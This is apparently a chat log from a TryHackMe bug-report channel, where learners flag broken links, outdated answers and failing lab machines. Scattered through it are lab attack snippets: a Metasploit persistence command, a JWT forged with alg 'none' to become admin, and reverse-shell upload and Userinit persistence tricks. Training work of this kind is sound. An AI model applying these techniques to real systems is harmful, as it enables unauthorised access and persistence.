Oops. Thanks! I've updated the URL in task 1 🙂
Gave +1 Rep to @quaint sparrow (current: #2 - 1825)
Thanks to you! (get your rep)
Gave +1 Rep to @rocky heart (current: #1962 - 1)
+rep @rocky heart
Gave +1 Rep to @rocky heart (current: #1298 - 2)
ah yes, sorry, I didn't scroll up. Ty MUTE3 🙂
I am receiving an error when attempting the rooms for my homework, can someone tell me what to do about it? https://prnt.sc/i2o78ivsJj6p Used the Lightshot URL uploader because I cannot attach the screenshot here.
sorry, we can't help with homework. Need to work with your professor/teacher on that. You can post screenshots after you verify your account.
Room: Blaster Task: 3
Problem 1: It wants you to look through the browser history to see where the user went. However, given the age of this room, IE doesn't show any recent pages. Since I saw the executable on the desktop, I was able to determine the CVE from there. You could try and find remnants in the user's temporary internet files, but I don't think that's the intent of the question. If the goal is to understand that your browser history can betray you, that isn't learned here any longer.
Task: 4
Problem 2: Again, given the age of the room, the persistence script from msf5 is no longer used in msf6 and there is now a persistence exploit module you need to use.. this means the answer about the command is incorrect.. The article it links to no longer shows the -X option and only references the -h option to show you it's no longer the way to run it.. Answered the question as required by finding the walkthrough answer, but it doesn't help new people doing it today.
I was unable to get persistence with the new module no matter whether I tried the service, exe or registry... in all cases, Windows Defender now recognizes the meterpreter shell (which appears to be the only payload you can attach to the persistence module).. So conceptually, it makes sense how it should work, but you can't actually test it out and just mark it as completed.
Room: Ra
Link: https://tryhackme.com/room/ra
Issue: ||Spark 2.8.3|| requires JRE 8 which doesn't install on any of the latest Linux distributions - lack of warning for users has them spending hours looking for a solution
Solution: Include ||Spark 2.9.4|| (installs and runs with the latest version of JRE) since the exploit is still present.
It's possible to get JRE 8.
I've tried to install it on the AttackBox, the Kali VNC, and on my local VM; it's possible, sure, but it's a pain - a small notice of this wouldn't hurt to have
It's a hard rated room; it's not meant to hold your hand.
Debugging is a big part of hacking -- if it's plausible to find the problem in the real world (and in this case it absolutely is, daily lmao), then it's absolutely fair game for a hard CTF 🤷♂️
fair point
As you've proven, there are at least two ways to solve the issue. Reckon that's probably sufficient 😆
tell me when to laugh at this meme, it will make you happier 
Right now
Yes
Hi I have completed the Nmap room, the room is 100% completed but in my dashboard it does not show it completed as per the screenshot I attach. Can someone help me?
same situation
same
Same here
I got the same issue
I'm not asking for help with my homework, I'm asking for help with the error that populates whenever I enter a room using THM... How did you interpret my question about the error as if I wanted help with the assignment? smh
And I refuse to give Discord my phone number, so if I can't get help with the error because of this, then so be it.
A bit disappointed tbh
I am receiving an error when attempting the rooms for my homework
Probably the fact you said homework...
But what is the issue?
Can you please verify your account and attach a screenshot if you wish to share a picture
same
same here :((
This is very likely due to a change that @obsidian kiln made in response to some feedback I gave them.. it's too coincidental that the problem started after they confirmed with me that they were making a change this am.. I brought it to their attention in a PM, but tagging them here as well.
This sort of bug appears every now and then.
There was a change made to clarify to folks that if you are a VPN user (and not an AttackBox user) that you will need to use -Pn since the Windows Firewall is treating the VPN traffic as public traffic and blocking ICMP.
Right, but as a beginner room teaching you Nmap, you get different results from using the AttackBox versus the VPN and since there is a task question directly related to it... well..
ARP, my beloved.
the firewall rules could be updated to recognize the VPN subnet as private, but with the older room it doesn't necessarily look like that's an option for the room maintainers.
Error codes and different results for beginners just get them frustrated while learning. This one's my fault too.. First it was the local hosts file change that all the walkthrough-followers are getting confused on, and now this.. maybe I should just let sleeping dogs lie.. haha
Close enough isn't good enough for some of us. I always tell people, the difference between a 0 and 1 can sometimes determine whether my weekend is wasted troubleshooting or having an outage.
I disagree.
This room was a perfect room for VM users to experience reading error codes and maybe adding -Pn to the command.
Could certainly see that as well. Guess it's just a matter of when to take the training wheels off. It's not a classroom setting, nor is there any way to directly ask questions. So with self-paced, you're left to figure it out on your own or to look for outside help, like the writeups that people do. And if you get different results than the writeups, or don't recognize that difference yourself, then you can flounder.... Since it was part of the beginner's path, I was thinking that the less variation the better. Even if this was past the halfway point and you'd become more familiar with Nmap at that point, it might be ok.. but its placement this early in an independent learning path had me thinking that it needed more clarity for the future. Oh well.. just wish it didn't cause it to break.
Agreed with that, but there was a question in the room explicitly asking whether the machine responded to ICMP echo packets. Different environments would give different (correct) answers to that question.
Same as me here, I completed that room and got a certificate from Complete Beginner, where Nmap is in Network Exploitation Basics
As folks work on other rooms/boxes and look at other tools, reading error codes and learning how to troubleshoot will be of great help and a must-have skill at least IMHO.
I'm having the same issue with Nmap! I'll check again and hopefully it's fixed soon!
Is this going off nmap scans?
Or the AttackBox using ARP to ping?
Gave +1 Rep to @obsidian kiln (current: #9 - 726)
Not a bug but Cisco Talos Intelligence whois is not providing answer anymore for the Task #6 of the Room: Threat Intelligence Tools.
Q: What is the customer name of the IP address?
I can't provide the screenshot, dunno why. haha
nvm, just use whois in CLI, not Cisco Talos.
Thanks!
You'll have to verify your account to post screenshots
An ARP ping would definitely do it -- from memory Nmap doesn't make a distinction when it does the host check (i.e., if either works, it calls it up).
I'm not sure if the discrepancy is due to the private / public network firewall settings on the VM or if Nmap is literally just falling back on ARP -- from memory the former. I think we did test this years ago
Same issue , please help
I always assumed this question referred to pinging the IP without Nmap, as in just the standard ping.
That's what I told anyone who had an issue anyway
Does it respond to the ping command when executed on the attackbox?
I don't think it did off the top of my head.
I'm not home to check.
Hey Muiri, can you take a look at it in site help? Another person is having the same issue
Link? I have no idea what channel that is
Can confirm, the nmap room doesn't respond when pinged in the attackbox
Which is the advice I'd give everyone, when they needed help with this question, and that's why I think the question was fine.
Also included the stats.
Now that's interesting, so it is that it's falling back on ARP. In that case, I'll shove the question back in but add a hint
For Nmap, yes.
Arp will kick in due to the machines being on the same network.
Aye, exactly
Did think it was a bit weird for me to have forgotten to explicitly block something I was relying on for a question...
Can you tell how long it's been since I built this room? 
~~1138 days~~
for some goofy reason the NMAP room is showing up as 99%, while it's completely finished
Staff are working on this.
Thanks thanks :)
Burpsuite room task 7 isn't showing completion after answering all questions
What's up hackers!
I'm currently doing the Linux Modules and I'm precisely in the task of the xxd command.
The problem is that I'm spotting loads and loads of basic English mistakes.
For example, instead of saying "sought", which is the past tense of the verb to seek, it's written "seeked".
I mean no disrespect of course, as it's not an easy thing to create a room for people to learn.
However, I'm not even a native English speaker and I've been spotting some English mistakes.
I just wanted to provide you with this quick feedback as a THM user.
The THM platform is the best out there and should be immaculately spotless.
Thanks!
There is a bug on the VM of the Yara room that makes underscore characters not shown on screen
Seeked is perfectly valid in UK grammar.
Welcome to the club - I'm used to US English, but my manager is in the UK. 😅
Is it? Everything I've found says it's either a misconstruction or not in the dictionary.
I checked Merriam-Webster
The couple of things I found for it said that it was highly informal
Sought is the proper past tense.
Seeked is more used in dialect.
Not sure I can get behind this one lol
It's more commonly used in spoken English, than written.
Can someone double check my work on https://tryhackme.com/room/threatinteltools Task 6 and see if the domain has definitely changed? I couldn't find the expected answer with any of the normal options (Talos, AbuseIPDB, or WHOIS)
Which answer are you trying?
Ah my bad, Task 6, the associated domain name question
Is this room bugged? I already started attackbox and the IP is incorrect. How do I connect to the Kibana instance machine?
type 10.10.225.136 in firefox on the right
I don't know if this counts as a bug, but the Complete Beginner path has the old version of 'Burp Suite: The Basics'. It looks like comparable content to the new version, and I would imagine it would be nice for beginners to get credit on that rather than have to effectively repeat the room. Nvm, looks like someone else found that last night and Scrubz already sent up the flare in #subscriber
Posted here: #pentest-plus-path message, but the https://tryhackme.com/room/lateralmovementandpivoting room network seems quite broken at the moment. VPN no longer connects (was working until this morning AEST) and even the AttackBox can't stay connected to the jump host
I believe I'm doing everything right. I was able to login a couple of hours ago. But then my machine restarted and now I am facing this bug.
I'm doing AoC2023 Side Quest 4, The Bandit Surfer.
@eternal kite Can you help?
There is no need to ping the Discord Admin, just post in one channel and someone will help you.
It's probably a room bug. I'm not sure anyone but the admins or staff will be able to help
It’s best to let community staff report it to us if there’s a problem 😄
Most employees who know how to deal with issues like these are relatively active in discord 👍
nothing on this? still an issue a day later...
You can’t connect with openvpn?
correct, specifically to the network for that room, the network also resets connections via attackbox
Linux Privilege Escalation room, task 8 (Capabilities) tells us to find a binary with a setuid capability to open flag4.txt (located in ||/home/ubuntu/flag4.txt||), but ||the flag file has chmod 644 making it world-readable, which bypasses the intended solution which is to use e.g. /home/karen/vim = cap_setuid+ep ||
Hi
Room: https://tryhackme.com/room/dataxexfilt
In «Task 3» the first image doesn't show up. (tested with 3 different browsers)
Is this the right place to report this?
Hi, I have the same problem
In room https://tryhackme.com/room/exploitingad, Task 2, "Exploiting Permission Delegation", there is mention of THMJMP1, which I believe should be THMWRK1. The -JMP1 name does not resolve, given the setting of "systemd-resolve --interface exploitad --set-dns 10.200.93.101 --set-domain za.tryhackme.loc" of Task 1. (Using the Attackbox.)
are the attacking ICS rooms no longer valid? there is something hinky with the python scripts
Requesting help with wording from a room. I know the answer, but the way it's requested to be entered is not as logical
https://tryhackme.com/room/ctiaipb --> Task 1 question 3
Why not just post it here? It's literally what the channel is for.
How do i post videos here !?
You need to verify.
Thanks.
Gave +1 Rep to @quaint sparrow (current: #2 - 1857)
Found a Bug on SQL Injection Task 8
I'm having trouble with the Windows Privilege Escalation Room, and I'm unable to reset my progress in the room
Were you able to resolve this?
Might it be better to link to the OWASP Top-10 from 2021 in this new room?
For Vulnerabilities101 (https://tryhackme.com/room/vulnerabilities101) - task 4, question 1 (about NVD), it seems the NVD website changed so much that it's no longer possible to find the answer in the demonstrated way. I then tried to find the answer using the newer NVD search API, but the answer I found there didn't work. I also looked at a few writeups to find the answer, but this answer was not accepted either
This is working with no issues -
Thanks
Gave +1 Rep to @unborn pulsar (current: #20 - 350)
https://tryhackme.com/room/jupyter101 - The "supporting material" link (Task 2 + 3) no longer works.
in this room https://tryhackme.com/room/encryptioncrypto101 task 9 hint for question #4 it mentions a room called CC: Pentesting but when you go to that room https://tryhackme.com/room/ccpentesting it's private
Yeah, it's private, the link should be removed
Cc @glad badger
how long does it take the network to reset in the Lateral Movement and Pivoting room
If it has taken more than a day to reset, I would recommend that you leave the network and simply re-join.
Disgruntled at task 5 question 4
the executes don't contain the goodbye.txt needed to search it up, so the os-update.sh doesn't contain the output file 🙂
Room: Blaster
Task 3
Internet Explorer history doesn't show the search history. I checked 3 different walkthroughs to make sure I was looking in the right place.
Edit: It's not a big deal since the hint gives the answer.
Hint was changed to give the answer because the history on the box disappears :)
Howdy. Noticed a small error possibly.
“Walking an Application” task 3 when looking at the page source for the website, it shows an example of “You’ll see the contact page on line 31”
However it seems to be on line 28. Nothing that breaks the room just thought I’d let someone know 😁
That's strange, it is on line 31 for me
🤔
You need to verify to do so
Are you on the /news page? Or maybe a different sub directory page? It being on line 31 is if you are viewing the source of https://10-10-184-214.p.thmlabs.com/. Seems like you are on https://10-10-184-214.p.thmlabs.com/news or something similar based off what I can see
lol, nw, that would explain the difference then
Yeah haha
In the Buffer Overflows room I guess the order of the steps for pop is reversed, and should be like this:
Store the value that was read from rsp into var
Increment the stack pointer by 8
references: http://6.s081.scripts.mit.edu/sp18/x86-64-architecture-guide.html
https://courses.cs.washington.edu/courses/cse351/17au/lectures/10/CSE351-L10-asm-III_17au-ink.pdf
@quaint sparrow how can I report this "misleading" false info please?
If you think its wrong, #room-bugs
ok thank you
Gave +1 Rep to @quaint sparrow (current: #2 - 1905)
https://tryhackme.com/room/introtonetworking
Task 8 : [Networking Tools] Dig
Where is the very first place your computer would look to find the IP address of a domain?
local cache
Have searched for the answer. It's all the same, but it won't work
Did you try reading the task, or just go straight to the writeups? 🙂
Oh, I'm damn. I didn't understand the question right. That's why I searched for the answer. Sorry for that
All good 🙂
Just for the sake of improvement, what did you think that the question was asking? I can try to clarify it a bit better
Yes, I guess firstly it is the hosts file, secondly the local cache and finally the DNS, right?
No, it's correct. I thought first of the DNS table (cache), but that's absolutely correct, the first thing is the hosts file. We all put the IP in that file for several THM boxes 😉
..Are you really winking because you think the creator of the room is wrong? 🤔
I don't think so?
No im just a happy person. But sorry for that inconvenient emoji
Might just be me, it did read condescending.
My apologies.
Hey.... it's a spoiler.. can you hide that with the spoiler tag
Mate, the answer in the text is written in bold, italicised, and quoted and a genuinely concerning number of people still don't get it right.
Not sure a lack of spoilers is desirable here lmao
think he was being ironic
Scrub's opinion may or may not be valid, but I agree with Muiri here, I think he's the one most likely to have found the correct answer on this one 👍
Probably because Muiri created the room 😂
Don't be jealous ahah
I've seen you contributed to some rooms yourself, you will create many more and get promoted to THM staff, I believe in you & I'm rooting for you, soon top 1 in the /giverep takeover
Hi,
I think I've found a typo in room https://tryhackme.com/room/abusingwindowsinternals, task 4.
In the second code block, it reads
```c
while (Thread32Next( // Obtains the next thread in the snapshot
    snapshot, // Handle of the snapshot
    &threadEntry // Pointer to the THREADENTRY32 structure
)) {
```
The typo is in "snapshot" handle which should be typed "hSnapshot".
Wow, good catch.
I know this has probably been reported before, but could someone add the 'dev-type tun' bit to the ovpn file for #enumerating-ad if possible? 😅
In a few rooms If I copy paste the flag or answer it doesn't work and I have to type it out, any fixes?
Hi, try using the clipboard in the AttackBox to confirm the text did in fact get copied before trying to paste it in the THM answer space. I noticed it is a bit finicky sometimes myself.
Look for writeups, don't type it out
issue in container hardening room - error when executing command for analyzing struts2 image and container.tar filesystem
```text
[0030] ERROR failed to fetch latest version: Get "https://toolbox-data.anchore.io/grype/releas
[0060] WARN unable to check for vulnerability database update
1 error occurred:
- db could not be loaded: the vulnerability database was built 5 days ago (max allowed age is 5 days)
```
Is there a bug currently with breachad not showing in the "Breaching AD" room (connecting from an AttackBox that I opened from inside the room, and I also tried resetting the network)?
Something is definitely wrong with the AWS Cloud environments and the room "AWS VPC - Attack and Defense".
Got locked out of the environment for a whole week until manual fixes, I managed to finish the room today and now every click on the button "Generate environment" or "Reset environment" just goes into a 502 Bad Gateway response code.
I guess that without any manual intervention i'll be once again locked out of the environment for the time being.
Every time it's the same issue : you click on the generate environment button in that room, get an error message stating that something wrong happened while creating the environment and then you cannot do anything, so I guess it can be easily reproduced
So I found this... The Burp Suite room Intruder Task 10 mentions that the length should be shorter for the login creds... I have run this thing like 30 times... I have not gotten the length to be different for the "Correct Creds." I used my bud Google and figured out that the answer was right in front of me all this time, but Burp Suite was not working correctly. https://tryhackme.com/room/burpsuiteintruder?path=undefined Attached is the output that I was receiving time and time again. Just bringing it to the devs' attention. Line Num:50 should be different, but it's not...
hey i found a way to get root access in the recovery room, don't know if it's the way i should do it
i think yes, nevermind 🙂
I have a bug on the windowseventlog room https://tryhackme.com/room/windowseventlogs
I can't see the questions in the room i tried to change browser clear cache and private nav but the bug is still there.
It's on my side or is there anyone as the same ?
The questions appear on mine
https://tryhackme.com/room/uploadvulns could use a tiny update 🙂 Also, even if I delete js from the match, I can't see the .js file.
I googled this but didn't find a solution. Might it have changed more than this?
I'll restart burp, that might be the thing...
Everything updated and still no success. Though I found a video that shows that this worked in older burp: https://youtu.be/k_k1MQcHgEQ?si=gwn3soeML-521Yq3&t=115
Hey 👋 just to double check, could you try viewing in another browser please? Do you have any extensions that might be blocking/flitering content?
I remember someone else having this problem aaaaages ago. Have to search the depths of my memory to remember what the resolution was
https://tryhackme.com/room/rppsempire - The images in Task 5 and half of Task 6 don't seem to work (Broken Google Drive links)
Done!
There is a problem where anyone can get root on your servers. Contact me directly, I don't want to show others because of the sensitivity. Thank you
There is a bug bounty programme, to which you report security vulnerabilities
Yep, I tried on a fresh VM and even my phone, nothing.
I left the room and now I can see the answers and work with the room. Don't know what caused this bug, but it's working now, thanks
Gave +1 Rep to @dusky junco (current: #8 - 802)
Ty very much.
Gave +1 Rep to @topaz thorn (current: #92 - 67)
Not much of a bug but it's something. In Wireshark: Traffic Analysis, Task 11. It references two rooms but they aren't linked. (Warzone 1 and Warzone 2). They should be linked
Hi, I'm doing this room right now and I'm getting the same error: KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
/room/adcertificatetemplates
Seems the certificate is out of date. Let me push a new image
Issue has been resolved
Do you meet the requirements for the room? I.e. are you subscribed? If not, do you have a streak of 7 days as a free user?
I once had a 100+ streak
You need to have a minimum of 7 at the time of joining the room
Yeah, I think the "Virtualization and Containers" room is bugged beginning on or about Task 6. The room's web server VM appears to start and be accessible, but the terminal is only quasi-functioning. Necessary commands like 'minikube' and 'kubectl' aren't recognized. Has anyone found a solution?
Hi, I started the room https://tryhackme.com/room/breachingad last week; today I wanted to continue but it seems to be bugged. I enter the room and it asks me to join again, but in the process it shows 35% complete.
Join Room does nothing
I'm subscribed
The network rooms kick you out every 10ish days for capacity reasons, joining right back should work just fine though and your progress will never be removed. If you are unable to join back then there might be an actual issue (screenshots would be helpful if that is the case).
Hi, I'm doing the room named «Intro to Logs» and I can't submit my answer in section 4 about the command line that is being executed
Hi, I'm doing the Lookback room, but unable to exploit it with Metasploit, even performing it with the same payload that other users have used in their writeups
I think the machine is not quite behaving like it should, that's why the exploit is failing. So please check and let me know
Hi, I'm trying out the Rust room (https://tryhackme.com/room/rust?path=undefined). I feel that the example given under Secure in the introduction task is not quite right. The example shows the concept of generators, which exhaust after one use. The function call is not the one modifying the value as such; it's the inner call (__next__) on the object which does. I kindly request the room creator/maintainer to modify the example to avoid confusion.
Hi all, I am doing the Benign challenge room and am having an issue with the last question. The C2 server link that I am supposed to access to give me the flag is giving me a 404 error.
Hey getting same error on the next Network (Persisting AD)
KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
Windows Internals room - Task Interacting with Windows Internals - when you enter the flag like it is on the machine (running the exe file to check the popup output), the capital letter H in the flag is actually a lowercase h. But when you submit the flag with h, at the end it is displayed as H.
When you paste the flag with H it shows an error.
Need to push a fix once a year. In the meantime, you can take the following steps to fix it yourself:
- RDP to the DC
- Run MMC
- Add the certificate snap-in for the Computer Account
- Under Personal, select request new cert
- Request the Kerberos, Domain Controller, and Domain Controller Authentication certificates
- Enroll
Should be working again then
I was doing https://tryhackme.com/room/obfuscationprinciples, task 4. I uploaded the PowerShell snippet without any modifications (on /challenge-1.html) and got the flag immediately, even though the output says something about "fail":
The file ps.ps1 has been uploaded.fail!
Warning: unlink(C:\Users\Administrator\Desktop\pass-1.txt): No such file or directory in C:\xampp\htdocs\upload-1.php on line 42
Room: Easy Peasy - https://tryhackme.com/room/easypeasyctf
Task 2 - 2nd Flag
I've found the ||md5|| hash hidden in ||/robots.txt||
But I don't think there are any rainbow tables available to get the result. I've gone through 6 writeups and they all use the same website https://md5hashing.net/ which is no longer online.
I used hashcat and john with all the wordlists I could think of, but obviously none of them would have flag{randomString} in them. I've tried the rainbow tables on all of the websites in the picture without luck.
I can give the hash if you wanna try yourself.
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
What do you mean no longer online? I visited it just now and it is still accessible?
I think the certificate is out of date again in the persisting AD room
I'm not entirely sure if I'm just doing something wrong or not but following:
OWASP Top 10 - 2021 on Task 20: https://tryhackme.com/room/owasptop102021
An issue I have after copying the original cookie is that the string contains an invalid character. Manipulating almost any part of the value itself returns something, but I'm not sure if doing so causes the cookie to be invalid because it's not what the website itself thinks it should be getting?
Token/Cookie:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzA4MjAzOTc0fQ.k_4v9TGt8iYEl0tkNyufO6RciDeS0T1mHWRPKaTRRvA
I've tried to just do as much troubleshooting as I can but I'm simply not sure if I'm missing something really simple here
here's the image of what happens when i try and put the cookie into the base64 decoder
Please change the link from the rooms for the OpenVPN to direct to this one: https://openvpn.net/community-downloads/
You can just decode the header and payload as the task says (ignore the signature) and there should be no error.
ok thank you, i'll try and let you know
Gave +1 Rep to @clear hornet (current: #43 - 162)
@clear hornet still get an error unfortunately-
What exactly are you typing in because that gives me no error at all
ok so, upon entering the site w/ the proper starting login- opening the dev console gives this as the cookie
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjY1MDc2ODM2fQ.C8Z3gJ7wPgVLvEUonaieJWBJBYt5xOph2CpIhlxqdUw
and after running it in the decoder this is the error that I get - and removing one of the characters does fix it - after which I change it from
{"typ":"JWT","alg":"HS256"}{"username":"guest","exp":1708215946}@ÚAfëUß.8ýú@tµhGºB½iÊÌ#y
to
{"typ":"JWT","alg":"none"}{"username":"admin","exp":1708215946}@ÚAfëUß.8ýú@tµhGºB½iÊÌ#y
and re-encode it, and putting the string given back into the console it just says it's wrong
You have the signature there still, you only need the header and payload. Make sure you are doing it exactly how the task says to.
removing the signature still comes back as it being wrong
are the dots important? I noticed trying to encode it gets rid of them, and trying to figure out where to put them (one at the end where the signature would've been and one to separate the header from the payload) I'm unable to see where the header vs payload dot would go? Would that be what's causing it?
Try to encode them separately and then put a dot between them and a dot at the end
ok that worked, thank you so much oh my goodness
Gave +1 Rep to @clear hornet (current: #43 - 163)
Think there might be a bug in terms of answering the last question of the Benign Room to where it is supposed to be https://controlc.com/548ab556.
Can you link the room please?
Didn't work for me either, I'll need to do this room.
Interesting. Think there might be something wrong with the back end.
Any luck?
I just went through the room myself and it accepted my answer (what you typed there was not the answer I found though)
Sorry just got back to this.
You're right, the website's still up. It was something on my end preventing the connection.
@clear hornet
Not really sure we are supposed to just share answers here. Have you tried to go through the room again and make sure you are doing it properly? Perhaps you could send a screenshot of where you got your answer and I could help you move from there to the correct one?
oh yeah we should do that
Okay, I have posted my question there.
Hey there, I am in the Learn the Linux Fundamentals Part 2: Permissions 101. And when I launch the attackbox and use the terminal I am not getting the same directories as the guided video. And I have closed the attackbox before and relaunched it and that didn't work either. Is there anything else I could try clear this up or is it a bug?
You need to open the attackbox, then the Linux Fundamentals 2 room, and SSH in to the IP.
Thank you for that advice, I was able to look back at the beginning of the module to find the instructions 😄
Gave +1 Rep to @quaint sparrow (current: #2 - 1987)
Hi, I cannot see the KoTH page to submit the flag
even the completed KoTH is showing the same empty page
Spectate link?
Oh I see it
Same
Let me report
is that because I patched the rabbit hole?
Looks like it's a site bug
okay ... hope you get to fix that soon ... thank you
Hey has anyone completed SSDLC?
I'm on the last task and entered the flag correctly, but it doesn't seem to be working
can't it be a bug/issue with the room, if I'm entering the flag correctly, but it's not going through?
This is unlikely. It’s best to first ask for help to see if it’s a bug, our community volunteers will be able to verify 🙂
okay I haven't been getting an answer on it and I'm just frustrated that the last question isn't going through haha
I'll wait for an answer in room-help then
thank you
From the report you have the MD5, search it in VirusTotal webpage and you will get the SHA256 there 🙂
Hi, the download link to github to download the ncat.exe in https://tryhackme.com/room/steelmountain is wrong.
It should be the one in the windows-binaries tool; nc.exe
and renaming the ncat.exe to nc.exe doesn't work
so you need to get the one from the windows-binaries
For more information, dm me staff :))
:hammer: nattram#0 has been banned.
Room Malbuster Q3, the answer 51 does not work. The answer to this question is also subject to change over-time in virus total
59 is current in virus total and that does not work
might be worth removing the question as the number will change over-time in virus total and people will most definitely get it wrong
I agree, however I don't think removal is the answer.
I suggest keeping the question, working off a screenshot, placing a disclaimer to let the user know that if they do X then the result Y will happen,
That way they can still answer the question & do the practical.
or the other alternative is to do one of those button click questions, i.e "Check number of detections in virus total" then you just hit the complete button for that bit and move to the next question
Hi there. I don't know why, but in the WebOsint room, even though my own research and every writeup I could possibly find shows ||6613102107|| as the answer for Q2 Task 2, tryhackme still can't accept it. Is it the room's problem or am I doing something wrong?
https://tryhackme.com/room/threatmodelling
the following question is outdated by 1 (I already got the answer right so maybe this was already updated, not really a 'bug' but wanted to let you guys know)
https://mitre-attack.github.io/attack-navigator/
https://tryhackme.com/room/owaspapisecuritytop105w
Task 3
Question 1
Answer format is asking for one letter but doesn't accept anything.
It's asking for a number
https://tryhackme.com/room/powershell
T3Q1
You are tasked to find a predefined file, the file in reality ||has double extension (.txt.txt)||
T4Q4
the provided hint should be for T4Q6 and/or T4Q7 for network info is not the same as group info.
T6
We are tasked to find all open ports in the range of 130-140. Correct answer is ||just total count of ports in range, instead of open ports|| as was tasked.
Surprised that the room is 1400+ days old with ~34k completions and still running into bugs like that, but I guess no one has reported them thus far, and it's just been shrugged off by everyone.
In soc level 1 learning path
Snort live attack challenge
At the first task the rule has to drop the connections to port 22, then you will get the flag, but when you drop the packets to port 80 you also receive the flag
Why ?
Mysql port is not open on internal network host. Machine name -> Contain Me
https://tryhackme.com/room/securesdlc
Task7 Security Assessments
When do you typically carry out Vulnerability Assessments or Pentests? -- question
The answer is this: xxxxxxxxxx x xxxxxxxxxxx .
But the correct answer would be xxxxxxxxxx xxx xxxxxxxxxxx this.
"and" instead of "a" would be the fix
I don't know if this is a bug, sorry if this is actually not a bug.
It seems you already have initial access to the target. Are you at the privesc step? I'm still stuck in it as well, but there should be a binary you need to supply some input to get root access.
This accessed machine has 2 ethernet interfaces. One of them we enter using a shell, the other one is connected to a host in the internal network. I am already rooted on the externally accessible Host1, but when I reached Host2 (internal host) with Mike I cannot do vertical privesc because the SQL service, which should normally be open, is not open.
In aoc 23 day 11 when you start the box the tools, whisker and rubeus, are there as they should when you start the box, but if you're not quick enough they are removed. If you restart the box and do all the commands at once it works, but you should have the time to read and ponder, right 🙂
Room: Source Code Security
Task: 8
Bad link URL
Problem: There is a dot '.' at the end of the link to:
https://docs.gitlab.com/ee/ci/yaml/gitlab_ci_yaml.html.
Solution: Remove the dot at the end of the link URL target.

good spotting
Room URL: https://tryhackme.com/room/sourcecodesecurity
Summary: Task 3, 'How does it work?' section, same paragraph appears twice with only minor differences.
+1 to this request - BurpSuite still does not render .js content. I overcame the issue by disabling the script altogether.
The Task #7 in UploadVulns room says "Having reloaded the webpage to put the filter back in place, let's take the reverse shell that we used before and rename it to be called "shell.jpg". As the MIME type (based on the file extension) automatically checks out, the Client-Side filter lets our payload through without complaining:", however this is not true for java.uploadvulns.thm filter script, which still needs to be disabled before uploading the jpg file.
That's because the client-side-filter.js is expecting a different filetype, read the source code again
Flag13 in Windows Local Persistence only works when you revert the steps from flag12. So you have to delete C:\windows\revshell.exe from Userinit.
Hi guys, there's a typo in Task13 of WireShark101:
https://tryhackme.com/room/wireshark
It should be task13.pcap rather than task11.pcap.
Thanks and have a good weekend 🙂
thank you for this - the answer was driving me nuts as I couldn't find it
Gave +1 Rep to @late oxide (current: #2022 - 1)
I think there is something wrong with the question "When was the SSL certificate the phishing domain used to host the phishing kit archive first logged? (format: YYYY-MM-DD)" in the room https://tryhackme.com/room/snappedphishingline
I have checked VirusTotal, crt.sh and other resources, but can't get the right answer.
I have also checked the writeups, but it seems like the question was changed.
Hey all,
I'm unable to deploy linux machine due to password and it says permission denied please try again.
https://tryhackme.com/room/linuxfundamentalspart2
I'm in the above task
It asks to use tryhackme and I'm using the same, but it's denying.
Any help
Not a bug.
You're using the wrong IP.
My bad! Thanks tho @quaint sparrow
Gave +1 Rep to @quaint sparrow (current: #2 - 2040)
@quaint sparrow could you check that or tell me where to ask?
You've asked in the correct channel, the answer will need updated. That's all.
Thanks!
Gave +1 Rep to @quaint sparrow (current: #2 - 2041)
In the room Data Exfiltration some images are wrong
https://tryhackme.com/room/dataxexfilt
this: https://tryhackme-images.s3.amazonaws.com/user-uploads/5d617515c8cd8348d0b4e68f/room-content/c2b48bf0b212e640b259a3405c2391b1.png
Hello, in Burp Suite Basics room task 13, we need to download PortSwigger Certificate from Burp Suite.
The room tells you to go to http://burp/cert which did not work for me. However, what worked was to go to http://burp or http://burpsuite and click the CA Certificate button.
And, uh, to what link does the CA Certificate button point?
⚠️ FYI there's a broken link right at the end of https://tryhackme.com/room/dfirprocesslegalconsiderations
pointing to: https://tryhackme.com/room/dfirplaybooks
The target machine has the same resources regardless if you connect to it via your own VM or the Attackbox.
So to me this sounds more like an issue on your end, like having had multiple VPN connections or a MTU value that's not working well on your end 🙂
https://tryhackme.com/room/persistingad
Task 3
One's supposed to be illegitimate not both are supposed to be legitimate
????
Offensive pentesting pathway,
https://tryhackme.com/room/skynet
Has an expired writeup link https://blog.tryhackme.com/skynet-writeup/
Blog.tryhackme.com doesn't even exist anymore
Just to mention, in the ConvertMyVideo Room, the yt_url call is taking too much time, either not returning anything or returning value after too long. Pretty sure this needs to be checked!!
@last loom The "Unattended" room has waaaay too little resources. It can barely crawl. I used 10 minutes to open RegistryExplorer, and autopsy is barely usable.
I love the rooms tasks, but the VM is barely functional
The one that you pinged is the THM bot.
oh, thanks
Gave +1 Rep to @unborn pulsar (current: #15 - 470)
Someone should respond to your concern though when they see or come across it.
ok, so I should just leave it here, hoping that some of the staff catch it? 😅
I have caught it and we will look into it 🙂
Thank you for bringing it up!
Gave +1 Rep to @leaden fossil (current: #2030 - 1)
Nice 🙂
hi all, I found a bug in the room "Blaster": https://tryhackme.com/r/room/blaster
@heavy spade and @dusky junco
[SPOILER on deprecated option]
Original request:
`Last but certainly not least, let's look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don't include anything beyond the base command and the option for boot startup.
||run persistence -X||
Run this command now with options that allow it to connect back to your host machine should the system reboot.`
Metasploit 6.3.55-dev output:
`meterpreter > ||run persistence -X||
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[-] The specified meterpreter session script could not be found: persistence`
hey guys, this room doesn't work at all....https://tryhackme.com/r/room/layer2 - like the VM boots but I get no info about the hosts, just the flood traffic. Tasks 1-6 have a different VM than 7-10. I can't seem to capture any of the data it's asking for and I'm following everything to the letter. Super interested in route/arp/dns poisoning so that's kinda why I'm in that room lol.
having same bug again with KDC_ERR_PADATA_TYPE_NOSUPP in the active directory persisting room. I followed instructions here to RDP to THMDC but cannot request new cert :
why are these active directory rooms so horribly bugged .... 😦 I am trying to solve all this for weeks now
